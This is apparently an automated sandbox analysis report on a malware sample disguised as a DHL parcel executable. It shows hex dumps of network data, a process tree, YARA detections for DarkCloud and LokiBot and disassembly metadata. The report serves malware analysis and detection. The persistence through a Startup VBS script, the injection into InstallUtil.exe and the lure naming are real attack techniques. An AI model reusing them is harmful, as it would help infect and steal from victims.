2024-11-09 08:20:42 UTC	8000	IN	Data Raw: a0 bf 57 6e f9 20 5d 62 2b 44 07 3b 48 6c ee cc 0d c2 aa 01 01 a3 12 3c 8a 98 ba 2c cc b2 e0 03 c4 4b 15 2f d2 bc 02 28 9a 6f 21 63 1a 0e 75 ac bb c1 f8 2e e9 71 aa 0b 19 ef 74 b6 87 c5 70 da 1a 4f d8 c0 2b 9a ba 38 9b 1f 3f 2f 4b ec 05 3f 63 2a aa c4 cd 54 79 b5 fc bd 05 f1 34 58 0a c5 6c e2 c9 7b 7e 59 e7 59 56 95 f0 be 23 98 2b 08 a1 cb e1 04 83 01 fb 27 d1 00 17 81 2b 09 19 d7 b9 34 6c 47 6a a3 bb 2a 97 5c 23 da 69 62 ee 60 9c 0b 8f 3e e1 e2 01 de f8 47 63 40 35 d0 2a 29 7e 13 b7 b4 bc f6 49 4e a2 f9 6c bb 80 cb 0a e0 d5 11 e2 74 63 af b8 8c 72 d7 76 3c c0 5f 2b 97 49 4f 76 3a ad f8 a7 da a5 c2 e0 00 be 6b c1 93 64 da c5 57 f3 14 c2 92 21 e5 53 42 e3 de 7d ca 35 4c b0 49 38 6a 9f 88 23 10 32 3c 2a be 78 66 47 49 4c db 67 d5 2a 10 64 7d 09 9f 39 27 1d Data Ascii: Wn ]b+D;Hl<,K/(o!cu.qtpO+8?/K?cTy4Xl{~YYV#+'+4lGj\#ib`>Gc@5)~INltcrv<_+IOv:kdW!SB}5LI8j#2<xfGILg*d}9'
2024-11-09 08:20:42 UTC	8000	IN	Data Raw: 5b 40 b2 2b 06 6f 64 eb 62 00 43 5e 34 f7 a5 be 22 15 95 93 c3 e7 4c 2a 34 f0 f0 bb 20 f8 0a d5 9e 0c 4d f0 c0 ae 7f 84 7a 76 2a 0d f6 88 5c e8 bf 59 45 14 99 4a 14 dd 88 05 e3 c5 32 e8 b3 b4 32 b8 13 6e 41 06 b0 61 a3 6f 5f c8 cd 4b 56 9a 41 6b 4d 64 ee 78 3f ef 4c 3d c9 3f df c9 c9 97 fd 54 51 1c b7 60 b7 bf b7 fd e4 51 66 3a 46 94 98 5a 3d 67 04 58 8a c0 49 21 c7 fb d1 81 64 04 e9 89 4b cb 05 0c ad 85 7b 1c 93 05 4e 7f 73 71 08 c1 73 d1 84 b9 f0 07 63 ac fb ff 95 04 3a 75 87 3d 4c 5d 98 33 44 aa 12 5f 55 f5 cf aa 44 e9 92 6b 16 3f a0 9a b9 99 c2 39 bb c7 f6 79 02 aa af cb 6d 0a 91 f8 f1 be fe a1 c7 f0 9e 23 d5 df 29 a8 e3 97 e3 cc f8 60 6c e8 87 0a 76 3b 04 a0 33 b0 34 99 27 e7 69 43 ca b7 cc 10 6b e3 8f 4a 91 7b b2 3d cd 92 86 ba 4f ef cb aa 33 57 96 Data Ascii: [@+odbC^4"L4 Mzv\YEJ22nAao_KVAkMdx?L=?TQ`Qf:FZ=gXI!dK{Nsqsc:u=L]3D_UDk?9ym#)`lv;34'iCkJ{=O3W
2024-11-09 08:20:43 UTC	8000	IN	Data Raw: 54 b8 da 2d 6e db 4a 63 e2 ad 27 7d d2 4c 01 22 d9 ea b2 7e 64 c4 1e 8d 80 92 bc e4 30 2f 2e ae 7c 14 b6 c5 d8 5d 50 43 5d 9e 02 93 b8 4a 3b 1d 60 10 ed 3a 35 ff 05 0d 75 f8 44 e7 cc 96 57 ea 7a aa 77 41 e4 2b 7e a5 f4 47 6e 07 f5 1a e2 f4 45 27 cf 41 29 29 a6 3f 3c 42 bb b2 1a 23 6c a0 e3 1f cf 9a 74 0e 79 38 54 4e fa 30 2d 98 0f 5b 3d 3c b7 2b 35 17 88 b0 77 b3 69 05 5a 1c 9d 17 ff b8 f6 9e c7 19 04 4d f8 36 b5 d2 b9 47 b7 dc 42 80 06 f0 c2 8b de 20 14 2c 1d 7a 1b 28 0f c7 8f 4c 78 58 bc 48 8c 12 79 3c e9 80 20 b1 a7 c6 d9 d9 22 e1 62 2d 2c 18 2c fd 43 44 3b e0 2f a6 1e 65 40 d0 49 f5 d4 e3 3c 90 ca 08 4d de dc dc 39 87 af b1 78 0c 67 96 f3 cc 76 ec 39 e0 b6 ca cd 8e eb a5 12 fb 73 9e 81 8d 4b 0f d1 fb ca 13 6c 7f 80 3d 56 75 09 3b 30 3a 1e bd 27 46 a7 Data Ascii: T-nJc'}L"~d0/.\|]PC]J;`:5uDWzwA+~GnE'A))?<B#lty8TN0-[=<+5wiZM6GB ,z(LxXHy< "b-,,CD;/e@I<M9xgv9sKl=Vu;0:'F
2024-11-09 08:20:43 UTC	8000	IN	Data Raw: e1 d3 2b 27 c3 af c4 3a dd 4f 23 6a 8a 71 ef c9 64 3b 22 0b b9 c7 80 c4 e7 20 87 e6 f2 3b da 3e 2b 1e 77 1e e7 e2 0e 58 82 da 29 90 73 f2 81 ac 31 b3 87 97 99 b6 2b 8f 3a 2a fa da e7 ca f5 94 3d e6 97 f7 40 b6 42 ba 25 48 ab 22 78 b1 5e fb 2f a9 c6 40 e9 b4 61 f7 76 ce db f8 0c da b6 4b 7a 57 d6 53 3c f4 3d be 4c a0 31 dc 98 dd 01 97 63 8c a2 89 28 15 00 d2 08 b3 c2 e2 74 c1 0c 7b 7e 5a 9b ef b8 e3 9a 49 33 a8 c1 dc 3a eb 8c 97 6a ab 5f 48 d0 9f ae 86 61 f2 78 ce dd 07 b6 bc db 6a bb 61 5f da 6e 57 9a db 38 5d a8 ff 56 4d f7 4c 62 17 98 fb 97 10 8b a6 fd 3a b7 fc c6 4f 5b 53 8d ad 82 d9 0f 16 1c 25 29 7e 10 38 87 a8 15 48 98 29 4a 6d 1a ca a9 44 02 f4 b0 3f 27 75 85 db de a2 cf 8e 31 73 95 a7 ef 26 2b 61 f9 5b 0b d2 85 ec cd 90 e5 6d 54 3c 75 d6 27 ba ff Data Ascii: +':O#jqd;" ;>+wX)s1+:*=@B%H"x^/@avKzWS<=L1c(t{~ZI3:j_Haxja_nW8]VMLb:O[S%)~8H)JmD?'u1s&+a[mT<u'
2024-11-09 08:20:43 UTC	8000	IN	Data Raw: dd da ba 2c d5 21 11 4f cc cd ba 4e 40 e6 56 3f f6 4e 56 4f 99 0e 89 39 89 65 b0 5b 59 08 2e 18 ca bc 57 f5 ad c0 de 46 58 e2 f6 4a 18 19 d1 83 fc b8 e0 04 ae 03 73 6e df 72 56 f1 76 55 59 e8 07 4b b4 cd 3b bc a6 88 23 ae 0a ff 67 2f 5b e0 9f 9b 7f 87 ca e4 a6 c5 60 dc 66 76 d6 97 32 b9 84 fe 99 a5 a5 b1 af fb 6b 4d 6e 87 72 81 7f 92 7f dc a1 28 d9 09 34 21 c3 32 79 54 38 19 31 40 74 79 87 d4 f0 66 a7 3a 8b 01 ab 83 e9 78 66 28 6a 92 d4 25 af c2 99 84 52 0b be 22 8a bb a7 0c f2 ae bb 36 bd ea 15 b3 6c 76 66 f3 55 96 93 cb 2d 03 84 fe ad db fa b6 0b 3b f8 56 03 b7 0d 3a 26 10 88 8a 12 5d 86 ba 30 b1 44 a6 ed 84 74 29 31 7a 58 d4 31 0e c0 d7 62 fc 29 29 b9 52 ee a2 ef 97 e6 03 91 21 72 bc 32 32 87 d4 d2 61 6e 8b 03 7a ec 40 24 56 0b a8 50 6a 45 de de da b7 Data Ascii: ,!ON@V?NVO9e[Y.WFXJsnrVvUYK;#g/[`fv2kMnr(4!2yT81@tyf:xf(j%R"6lvfU-;V:&]0Dt)1zX1b))R!r22anz@$VPjE
2024-11-09 08:20:43 UTC	8000	IN	Data Raw: 2b fd 38 26 b3 5c da 58 30 72 7b d3 0d fd 97 1f a7 14 9e 27 2f c5 72 6f e6 99 f5 31 7e b6 29 88 8f 34 36 6b ae 5f 17 78 50 4f 6b 6a a8 97 bd 17 e7 a3 56 ba d5 83 5c 17 57 11 61 dc ad fd 1b b8 63 c4 69 ba d2 12 d8 68 c9 5c 02 a1 3f bc 11 18 a1 61 90 69 e2 48 5a fe 5d a6 be d3 c6 55 d2 1d 59 0e 28 91 5e 1a fa 49 a0 b5 e2 35 b3 32 05 e4 b0 dd ae 0a 1d ca 4e c0 dc b0 a6 78 d5 02 0f 95 c5 92 85 7a 17 e8 75 3a 0b 26 30 15 cf 92 88 c0 8b 12 53 50 62 ef dc 38 1f e1 c3 98 62 65 6b bf d2 b5 38 8f a3 0b da e4 2a 7e e5 3d 68 b3 ad 3a 11 f2 98 b9 dc 95 4e e0 40 29 44 e5 7b d7 5d 72 f9 d3 1e 4c c1 0e 8c 23 2e 22 67 23 31 dc 92 4b fc ff 84 9e 71 dd b5 9e b2 5a 17 86 f1 dc df e2 bf 00 90 05 ff 0b 53 45 3d 3f bd f2 84 db 49 fa 86 91 09 93 23 0d d8 8f 25 fe c8 85 0f 2e dd Data Ascii: +8&\X0r{'/ro1~)46k_xPOkjV\Wacih\?aiHZ]UY(^I52Nxzu:&0SPb8bek8*~=h:N@)D{]rL#."g#1KqZSE=?I#%.
2024-11-09 08:20:43 UTC	8000	IN	Data Raw: 6d 37 14 0f 84 4e 11 e4 c8 60 a8 5f 12 e6 fa a0 a8 60 69 84 97 b6 ae 9f d0 e5 67 4b 57 64 9e aa b7 bc 5f c5 fe c0 3b fc fd b2 a4 14 83 66 fa d1 06 79 a5 f7 05 e3 d0 6e f8 db cf 4a b8 91 aa 27 a7 9c ff ab d5 37 58 64 33 93 3c 12 60 bd b4 83 4b 3b bc 5f b5 0b aa ed f0 d1 c7 d7 5a c0 f3 49 6f f3 8e 9d 31 94 58 c0 18 9c 65 b4 25 36 83 b1 a5 b6 c2 a3 b5 a9 b7 57 91 43 a4 a8 9a 72 33 d7 58 90 11 c4 15 e7 29 57 00 5e 7c 1e d1 cc 3c 36 77 f7 24 88 ed 55 20 7b d7 64 dd aa 53 45 c1 88 df 1f 25 9f 49 27 a4 8e 19 b8 85 96 02 42 a8 40 ae e1 6b 97 62 8d be f3 8b 1d f8 e2 7f 44 71 68 e9 3a c4 91 72 c2 cc c4 97 d3 43 90 16 b4 30 5e f0 b4 e6 6b 10 51 09 97 9e 8a 5a 88 63 07 35 81 05 2f 2e 69 c7 9f 33 51 04 3a 50 d1 a9 cc 71 41 26 5a fc 7b 05 e9 85 ce 66 29 23 23 0d 61 49 Data Ascii: m7N`_`igKWd_;fynJ'7Xd3<`K;_ZIo1Xe%6WCr3X)W^\|<6w$U {dSE%I'B@kbDqh:rC0^kQZc5/.i3Q:PqA&Z{f)##aI

Analysis Process: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exePID: 6152, Parent PID: 1028

General

Target ID:	0
Start time:	03:20:20
Start date:	09/11/2024
Path:	C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe"
Imagebase:	0x510000
File size:	97'280 bytes
MD5 hash:	EFC42AEBB5315984C43B7267F47217F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2116282473.0000000006660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:20:26
Start date:	09/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x7c0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:20:39
Start date:	09/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs"
Imagebase:	0x7ff6cdc50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:20:39
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Roaming\Size.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Size.exe"
Imagebase:	0xf60000
File size:	97'280 bytes
MD5 hash:	EFC42AEBB5315984C43B7267F47217F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:20:46
Start date:	09/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x8b0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exePID: 6152, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	98.9%
Signature Coverage:	6.6%
Total number of Nodes:	377
Total number of Limit Nodes:	28

Executed Functions

Function 0675CD30 Relevance: 16.2, Strings: 12, Instructions: 1179COMMON

Download Yara Rule

Strings

,iq, xrefs: 0675D7EA
$eq, xrefs: 0675CFB3
$eq, xrefs: 0675D66A
$eq, xrefs: 0675D177
$eq, xrefs: 0675D611
4, xrefs: 0675D705
$eq, xrefs: 0675D65A
$eq, xrefs: 0675D187
$eq, xrefs: 0675D227
$eq, xrefs: 0675CFC3
$eq, xrefs: 0675D237
$eq, xrefs: 0675D601

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: ,iq$4$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1238709156
Opcode ID: db61afe76530ac045222d5b4e8c961665b39aa82cd8ea01acee1ff998301467d
Instruction ID: 79ed243f4cd8135673edefa0dc6745cb9081ee2fd14988a0a68f69b968f0987f
Opcode Fuzzy Hash: db61afe76530ac045222d5b4e8c961665b39aa82cd8ea01acee1ff998301467d
Instruction Fuzzy Hash: D6B2E775A00228CFDB64DFA4C894BADB7B6FF48300F158599E905AB2A5DBB0DD81CF50

Function 027BB338 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJjq, xrefs: 027BB4DA
xbhq, xrefs: 027BB465
Teeq, xrefs: 027BBA5B
piq, xrefs: 027BBEF2

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$Teeq$piq$xbhq
API String ID: 0-2649575939
Opcode ID: 2c60680a0469ac761d3444095a285d0f8eef0197611a219a7454ae5fe30559eb
Instruction ID: eea6cb57639174d9b7e0a0314512a9621f1885bd682b7a9e55fd26effae9d6a4
Opcode Fuzzy Hash: 2c60680a0469ac761d3444095a285d0f8eef0197611a219a7454ae5fe30559eb
Instruction Fuzzy Hash: E7A29475A00628CFDB65CF69C984BD9BBB2BF89304F1581E9D909AB225D7319E81CF40

Function 027B4160 Relevance: 5.2, Strings: 4, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d%kq, xrefs: 027B4273
$eq, xrefs: 027B43C9
$eq, xrefs: 027B43D5
d%kq, xrefs: 027B4305

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: d%kq$d%kq$$eq$$eq
API String ID: 0-1514485977
Opcode ID: b4afbb7cc4fa786f515e2790d5fe397dd23f49478085d4ef1a5ee9fd8b9c85dc
Instruction ID: 8d1152823130bce19b51fd3c63e8e24dba1d583614f5895f259c30313986f231
Opcode Fuzzy Hash: b4afbb7cc4fa786f515e2790d5fe397dd23f49478085d4ef1a5ee9fd8b9c85dc
Instruction Fuzzy Hash: 6D610874B042088FDB16DA789C717AB7BA6BF8A300F15856AD406EB3D7DA70DC418791

Function 065E0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 065E06A2
2, xrefs: 065E101E

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 2$$eq
API String ID: 0-57214535
Opcode ID: beae5301834464820506d0f2166c611c59a32d963d37121f740e3873d549c9d6
Instruction ID: 69e74f98cb50c7fb112c4058c53681788e6b03bd94db3abe17913661f6615488
Opcode Fuzzy Hash: beae5301834464820506d0f2166c611c59a32d963d37121f740e3873d549c9d6
Instruction Fuzzy Hash: BBE2E7B4E016288FDB65DF69D8847DABBB2FB88300F1081EAE509A7345DB345E85DF41

Function 06774840 Relevance: 3.1, Strings: 2, Instructions: 632
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 06774948
8, xrefs: 06774935

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: fjq$8
API String ID: 0-2019453504
Opcode ID: b94dbbb7d967c8918e32978dc9158d92fb6b895321b1519254e954777b8ef48d
Instruction ID: ba0ff677d89aa8c0d3d2bacf74ff9f0e771dfe31596a8b454a29e04e4007aede
Opcode Fuzzy Hash: b94dbbb7d967c8918e32978dc9158d92fb6b895321b1519254e954777b8ef48d
Instruction Fuzzy Hash: EA62D775E002298FDBA4DF69CC50AD9B7B1FF89300F5081AAD909A7355DB34AE85CF50

Function 067792B8 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583bfe82098116e8f897ce24e08bc42e28c928b2a2da994c1e912d03d290d9d9
Instruction ID: fa7c515ba152414134f034b87533d83a93e5bc947de603fa3df07d5750cea0e1
Opcode Fuzzy Hash: 583bfe82098116e8f897ce24e08bc42e28c928b2a2da994c1e912d03d290d9d9
Instruction Fuzzy Hash: F331DF719053498FCB50EFA9D8806AEFFF8EF89310F54842ED518AB291CB395804CFA4

Function 0677830A Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06778399

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6529a813ec366406b248a8bef7569c19f6b4abd5359207b1d005dc44f3101469
Instruction ID: fe5822e9ad8fa5bd4a7f65d3e289ae2939c27ed758f6e880a77f7c5c6dcb3333
Opcode Fuzzy Hash: 6529a813ec366406b248a8bef7569c19f6b4abd5359207b1d005dc44f3101469
Instruction Fuzzy Hash: CF2125B1D003499FCB10CFAAD984AEEFBF5FF48310F20842AE519A7250C7759901CBA1

Function 06778310 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06778399

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 78017112cc3218f201f74dee089ec40cdce88cc3d5bbd6a106459084c3e62b74
Instruction ID: d3a46d1645d1aac4f91981aee6354decc235cd5ffca1ac56c79d1ec616f4c571
Opcode Fuzzy Hash: 78017112cc3218f201f74dee089ec40cdce88cc3d5bbd6a106459084c3e62b74
Instruction Fuzzy Hash: 3021E4B5D003499FCB10DFAAD984AEEFBF5FF48310F20842AE519A7250C7759945CBA1

Function 06779340 Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 067793B6

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 60703d97bce30f47a80d1fbe5472e8b0517d4bae100fbcdcbbe90245dfb9ea46
Instruction ID: 126fa6cd809fb93a4cb26c8b4b8bf85413522c46cf14685c386b43c3cfae3339
Opcode Fuzzy Hash: 60703d97bce30f47a80d1fbe5472e8b0517d4bae100fbcdcbbe90245dfb9ea46
Instruction Fuzzy Hash: 031136B1D003098FDB10DFAAC885AEEFBF8EF49324F50842AD519A7240CB745945CFA1

Function 06779348 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 067793B6

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b8228dd19509bf8f49bf01bd54c84603e9accdfb6601efe4ec8efb90da3fe1cf
Instruction ID: f4db24f6650288fee719c1a81940b61cb0c4cedf83348ad2a16c0c8e3df8b8be
Opcode Fuzzy Hash: b8228dd19509bf8f49bf01bd54c84603e9accdfb6601efe4ec8efb90da3fe1cf
Instruction Fuzzy Hash: 721129B1D003098FDB10DFAAC8846AEFBF4EF49320F54842ED519A7240CB745945CFA1

Function 065CE9B5 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

PHeq, xrefs: 065CECC8

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 561d9ec08810e130f9473a8aa071f1fcd71f83d1657efc40a39c5775b1bf6463
Instruction ID: 795ae0836d5fb1d51b43acd6a992bc2072ff761b3633e1fd5b43fe63a9d5fa2f
Opcode Fuzzy Hash: 561d9ec08810e130f9473a8aa071f1fcd71f83d1657efc40a39c5775b1bf6463
Instruction Fuzzy Hash: C0C10774E05218CFEBA4DFA9C885BADBBF2FB89310F2080A9D409AB245D7745D85CF41

Function 065EE8D0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Teeq, xrefs: 065EE9E2

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 9562ccece29315993fbf5dac7039adbec4d73c05bd773d1a3fa924ec998227ae
Instruction ID: b1ce99424687170295fa0b6885a11b03d6b047c6d7a7a9910f6649cbcf8603ac
Opcode Fuzzy Hash: 9562ccece29315993fbf5dac7039adbec4d73c05bd773d1a3fa924ec998227ae
Instruction Fuzzy Hash: C1B1E574E11218CFDBA8CFA9D585BADBBF2BF48300F2094A9D409EB255D7745985CF40

Function 065EE8E0 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

Teeq, xrefs: 065EE9E2

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 0fc2cf37cb42a719e8c267278af2f6e8cf6dc7fa301d445a7ff1c62a4e8157b6
Instruction ID: 4c7fbb41951bf5387829693e6310404b6a6f6e0531475501526eca687211b224
Opcode Fuzzy Hash: 0fc2cf37cb42a719e8c267278af2f6e8cf6dc7fa301d445a7ff1c62a4e8157b6
Instruction Fuzzy Hash: B6B1F570E11218CFDBA8CFA9D585BADBBF6BF48300F2094A9D409EB255DB745985CF40

Function 027B34B8 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26291218e28d04d104d27314272c72c50802084a9594625c2b9767ca9d0d6082
Instruction ID: 7a6e45c6955374305f0b8b7e77a7eda164170f68e6a4f30cbad3af4cb319df5f
Opcode Fuzzy Hash: 26291218e28d04d104d27314272c72c50802084a9594625c2b9767ca9d0d6082
Instruction Fuzzy Hash: A032A030A04249DFCB13DF69C894BEABBB1EF49314F1485AAE406EB252D734E985CB51

Function 065E19A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
